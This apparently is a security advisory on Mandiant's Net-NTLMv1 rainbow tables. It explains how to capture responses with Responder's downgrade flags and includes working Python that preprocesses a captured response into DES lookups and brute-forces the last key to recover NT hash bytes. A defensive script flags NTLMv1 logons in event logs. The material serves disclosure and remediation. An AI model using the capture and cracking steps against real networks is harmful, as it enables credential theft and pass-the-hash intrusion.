Introduction
Mandiant has released a dataset of Net-NTLMv1 rainbow tables to emphasize the urgency of migrating away from this outdated protocol. Despite being deprecated and known to be insecure for more than two decades, Net-NTLMv1 remains common in active environments. Any captured Net-NTLMv1 response can now be turned into the NT hash of the user or computer account that produced it, leaving organizations exposed to credential theft.
Background
Net-NTLMv1 has been widely known to be insecure since at least 2012, with cryptanalysis dating back to 1999. The rainbow tables let defenders and researchers recover the DES keys behind a captured Net-NTLMv1 response, and with them the account's NT hash, in under 12 hours on consumer hardware, which underlines the need to disable Net-NTLMv1 outright and to prevent the authentication coercion attacks that are used to capture such responses.
Dataset Release
The unsorted dataset can be downloaded with gsutil, and the SHA512 hashes published alongside the tables should be checked to verify the download. The password cracking community has already produced derivative work and is hosting sorted, ready-to-use tables.
Use of the Tables
Once a Net-NTLMv1 response has been captured, the tables can be searched with rainbow table software such as rainbowcrack or RainbowCrack-NG. The response is three DES encryptions of the 8-byte server challenge: the 16-byte NT hash is padded with five zero bytes and split into three 7-byte DES keys, so the captured value first has to be preprocessed into those DES components with ntlmv1-multi. The tables answer the lookups for the first two keys (14 bytes of the NT hash) for the fixed challenge 1122334455667788; the third key carries only the last 2 bytes of the hash and is brute-forced directly. If the challenge is anything other than that fixed value (for example because Extended Session Security was negotiated), the precomputed tables do not apply.
Obtaining a Net-NTLMv1 Hash
Attackers can use Responder with the --lm and --disable-ess flags to obtain a Net-NTLMv1 response: --lm forces the downgrade to LM/NTLMv1 and --disable-ess disables Extended Session Security, so the client computes its response directly over Responder's default challenge 1122334455667788, the challenge the tables were built for. The cracked response yields the NT hash of the user or computer (machine) account that authenticated, which is usable as-is for pass-the-hash without ever recovering the password.
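The steps above (capture with the fixed challenge, split into DES components, look up the first two keys, brute-force the third) as an added worked example. This is not code from Mandiant, Responder or ntlmv1-multi; it reimplements the preprocessing that ntlmv1-multi performs and includes a pure-Python DES so it runs offline. The NT hash, user and domain are constructed values, and the lines it emits use the ciphertext:plaintext layout of hashcat mode 14000 as a stand-in for whatever input format your table-searching tool expects.

```python
# Added example; not code from Mandiant or from ntlmv1-multi. It shows what
# "preprocessing a Net-NTLMv1 hash to its DES components" means: split the NT
# response, emit the two lookups a DES rainbow table answers, and brute-force the
# third key. Sample values are constructed; FIXED_CHALLENGE is Responder's default.
IP = [58,50,42,34,26,18,10,2,60,52,44,36,28,20,12,4,62,54,46,38,30,22,14,6,64,56,48,40,32,24,16,8,
      57,49,41,33,25,17,9,1,59,51,43,35,27,19,11,3,61,53,45,37,29,21,13,5,63,55,47,39,31,23,15,7]
FP = [IP.index(i) + 1 for i in range(1, 65)]                         # inverse of IP
E = [(4 * i - 1 + j) % 32 + 1 for i in range(8) for j in range(6)]  # 32 -> 48 bit expansion
P = [16,7,20,21,29,12,28,17,1,15,23,26,5,18,31,10,2,8,24,14,32,27,3,9,19,13,30,6,22,11,4,25]
PC1 = [57,49,41,33,25,17,9,1,58,50,42,34,26,18,10,2,59,51,43,35,27,19,11,3,60,52,44,36,
       63,55,47,39,31,23,15,7,62,54,46,38,30,22,14,6,61,53,45,37,29,21,13,5,28,20,12,4]
PC2 = [14,17,11,24,1,5,3,28,15,6,21,10,23,19,12,4,26,8,16,7,27,20,13,2,
       41,52,31,37,47,55,30,40,51,45,33,48,44,49,39,56,34,53,46,42,50,36,29,32]
SHIFTS = [1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1]
# S-boxes S1..S8, each as 64 hex digits (row 0 first, 16 entries per row).
SBOX = [s.replace(" ", "") for s in (
    "e4d12fb83a6c5907 0f74e2d1a6cb9538 41e8d62bfc973a50 fc8249175b3ea06d",
    "f18e6b34972dc05a 3d47f28ec01a69b5 0e7ba4d158c6932f d8a13f42b67c05e9",
    "a09e63f51dc7b428 d709346a285ecbf1 d6498f30b12c5ae7 1ad069874fe3b52c",
    "7de3069a1285bc4f d8b56f03472c1ae9 a690cb7df13e5284 3f06a1d8945bc72e",
    "2c417ab6853fd0e9 eb2c47d150fa3986 421bad78f9c5630e b8c71e2d6f09a453",
    "c1af92680d34e75b af427c9561de0b38 9ef528c3704a1db6 432c95fabe17608d",
    "4b2ef08d3c975a61 d0b7491ae35c2f86 14bdc37eaf680592 6bd814a7950fe23c",
    "d2846fb1a93e50c7 1fd8a374c56b0e92 7b419ce206adf358 21e74a8dfc90356b")]
FIXED_CHALLENGE = bytes.fromhex("1122334455667788")  # what Responder --lm --disable-ess sends

def permute(value, table, width):
    """Bit permutation; table entries are 1-based positions counted from the MSB."""
    out = 0
    for pos in table:
        out = (out << 1) | ((value >> (width - pos)) & 1)
    return out

def subkeys(key64):
    """16 round keys of 48 bits; the parity bits (8, 16, ...) are dropped by PC1."""
    cd = permute(key64, PC1, 64)
    c, d, keys = cd >> 28, cd & 0xFFFFFFF, []
    for s in SHIFTS:
        c = ((c << s) | (c >> (28 - s))) & 0xFFFFFFF
        d = ((d << s) | (d >> (28 - s))) & 0xFFFFFFF
        keys.append(permute((c << 28) | d, PC2, 56))
    return keys

def feistel(r, k):
    x, out = permute(r, E, 32) ^ k, 0
    for i in range(8):
        six = (x >> (42 - 6 * i)) & 0x3F
        row, col = ((six >> 5) << 1) | (six & 1), (six >> 1) & 0xF
        out = (out << 4) | int(SBOX[i][row * 16 + col], 16)
    return permute(out, P, 32)

def des_encrypt(key8, block8):
    """Single-block DES encryption, the only primitive Net-NTLMv1 uses."""
    lr = permute(int.from_bytes(block8, "big"), IP, 64)
    l, r = lr >> 32, lr & 0xFFFFFFFF
    for k in subkeys(int.from_bytes(key8, "big")):
        l, r = r, l ^ feistel(r, k)
    return permute((r << 32) | l, FP, 64).to_bytes(8, "big")

def expand_key(key7):
    """Spread 56 key bits over 8 bytes with odd parity (the DES key form)."""
    bits, out = int.from_bytes(key7, "big"), bytearray()
    for i in range(8):
        b = ((bits >> (49 - 7 * i)) & 0x7F) << 1
        out.append(b | (bin(b).count("1") % 2 == 0))
    return bytes(out)

def ntlmv1_response(nt_hash, challenge):
    """NT response = DES_K1(C) || DES_K2(C) || DES_K3(C); K1..K3 are 7-byte slices of NT hash + 5 zero bytes."""
    k = nt_hash + b"\x00" * 5
    return b"".join(des_encrypt(expand_key(k[i:i + 7]), challenge) for i in (0, 7, 14))

def split_netntlmv1(line):
    """Parse a Responder / hashcat -m 5500 line: user::DOMAIN:lmresp:ntresp:challenge."""
    user, _, domain, _lm, nt, chal = line.strip().split(":")
    nt, chal = bytes.fromhex(nt), bytes.fromhex(chal)
    return {"user": user, "domain": domain, "challenge": chal,
            "ct1": nt[:8], "ct2": nt[8:16], "ct3": nt[16:24]}

def table_lookups(parts):
    """The two ciphertext:plaintext lookups (hashcat -m 14000 layout) the rainbow tables answer."""
    if parts["challenge"] != FIXED_CHALLENGE:
        raise ValueError("challenge is not 1122334455667788; precomputed tables do not apply")
    return [parts[c].hex() + ":" + FIXED_CHALLENGE.hex() for c in ("ct1", "ct2")]

def recover_key3(ct3, challenge):
    """K3 is NT-hash bytes 14..15 plus five zero bytes, so at most 65536 DES trials."""
    for cand in range(0x10000):
        k2 = cand.to_bytes(2, "big")
        if des_encrypt(expand_key(k2 + b"\x00" * 5), challenge) == ct3:
            return k2
    return None

if __name__ == "__main__":
    # Constructed NT hash (no real account); its last two bytes are small so the demo search ends early.
    nt = bytes.fromhex("00112233445566778899aabbccdd0042")
    resp = ntlmv1_response(nt, FIXED_CHALLENGE)
    line = f"alice::CORP:{resp.hex()}:{resp.hex()}:{FIXED_CHALLENGE.hex()}"  # LM field copied, as clients with no LM hash do
    parts = split_netntlmv1(line)
    print(table_lookups(parts), recover_key3(parts["ct3"], parts["challenge"]).hex())
```

The two lookup lines are what the tables turn into K1 and K2, i.e. the first 14 bytes of the NT hash; the recovered K3 supplies the last two, and the full 16 bytes are the pass-the-hash credential. The ValueError branch is the check to run first on any capture: a response computed over a non-default or ESS-derived challenge has to be cracked by brute force, not looked up.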
Remediation
Organizations should immediately disable Net-NTLMv1 by setting the LAN Manager authentication level (LmCompatibilityLevel) to "Send NTLMv2 response only. Refuse LM & NTLM" (level 5). The lower "Send NTLMv2 response only" settings (levels 3 and 4) only stop a host from sending NTLMv1; servers and domain controllers at those levels still accept NTLMv1 responses from other clients. Monitoring and alerting on when and where Net-NTLMv1 is still used is also necessary, both to find the systems that need fixing and to catch coercion attempts; logon event 4624 records the variant in its "Package Name (NTLM only)" field, where NTLM V1 or LM identifies the DES-based responses these tables break.
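As an added example (not Mandiant's or Microsoft's code), the monitoring half of that advice run over constructed sample data: the field names are the EventData names Windows writes for event 4624 (AuthenticationPackageName, LmPackageName, WorkstationName, IpAddress, TargetUserName), the records themselves are made up, and the exposure table encodes which LmCompatibilityLevel values still send or still accept NTLMv1.

```python
# Added example; not code from Mandiant or Microsoft. Flags Net-NTLMv1 (and LM)
# logons in Security event 4624 records and rates an LmCompatibilityLevel value
# (HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel).
import csv
import io
from collections import Counter

# Constructed sample: 4624 records exported as TSV (real exports carry more columns).
SAMPLE_4624 = """\
TimeCreated\tTargetUserName\tAuthenticationPackageName\tLmPackageName\tWorkstationName\tIpAddress\tLogonType
2024-08-01T09:00:01\talice\tNTLM\tNTLM V2\tWS01\t10.0.0.21\t3
2024-08-01T09:00:07\tsvc-print\tNTLM\tNTLM V1\tPRINTSRV\t10.0.0.55\t3
2024-08-01T09:00:09\tbob\tKerberos\t-\tWS02\t10.0.0.22\t3
2024-08-01T09:01:40\tFILESRV$\tNTLM\tNTLM V1\tFILESRV\t10.0.0.40\t3
2024-08-01T09:02:13\tsvc-print\tNTLM\tNTLM V1\tPRINTSRV\t10.0.0.55\t3
2024-08-01T09:03:00\tcarol\tNTLM\tLM\tLEGACY01\t10.0.0.99\t3
"""

WEAK_PACKAGES = ("NTLM V1", "LM")  # both are DES over the challenge and fall to the same tables

def weak_ntlm_logons(tsv_text):
    """Return the 4624 records whose NTLM sub-package is V1 or LM; Kerberos logons show '-' here."""
    rows = csv.DictReader(io.StringIO(tsv_text), delimiter="\t")
    return [r for r in rows
            if r["AuthenticationPackageName"] == "NTLM" and r["LmPackageName"] in WEAK_PACKAGES]

def summarize_by_source(records):
    """Count weak logons per (workstation, source IP, account) so owners of each offender can be found.
    Machine accounts (names ending in $) matter as much as users: their NT hash is what coercion yields."""
    return Counter((r["WorkstationName"], r["IpAddress"], r["TargetUserName"]) for r in records)

def lmcompat_exposure(level):
    """What a host at this LmCompatibilityLevel still does. Only level 5 both stops sending
    NTLMv1 and refuses it from others; levels 3-4 stop sending but keep accepting."""
    if not 0 <= level <= 5:
        raise ValueError("LmCompatibilityLevel must be 0..5")
    return {"sends_v1": level <= 2, "accepts_lm": level <= 3,
            "accepts_v1": level <= 4, "compliant": level == 5}

if __name__ == "__main__":
    weak = weak_ntlm_logons(SAMPLE_4624)
    for (host, ip, account), n in summarize_by_source(weak).most_common():
        print(f"{n:3d}  {account:<12} from {host} ({ip})")
    print("level 3:", lmcompat_exposure(3))
    print("level 5:", lmcompat_exposure(5))
```

Run against a real export, the summary gives the remediation worklist: every (host, account) pair that still produces NTLM V1 or LM logons has to be fixed before the domain controllers can be moved to level 5 without breaking it, and any pair that appears after the move is either a misconfiguration or an attacker coercing authentication.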
Lessons Learned
The release of the Net-NTLMv1 rainbow tables turns a long-known theoretical weakness into a cheap, repeatable attack, and highlights the importance of migrating away from outdated protocols and of continuous monitoring and remediation to prevent authentication coercion from yielding usable credentials.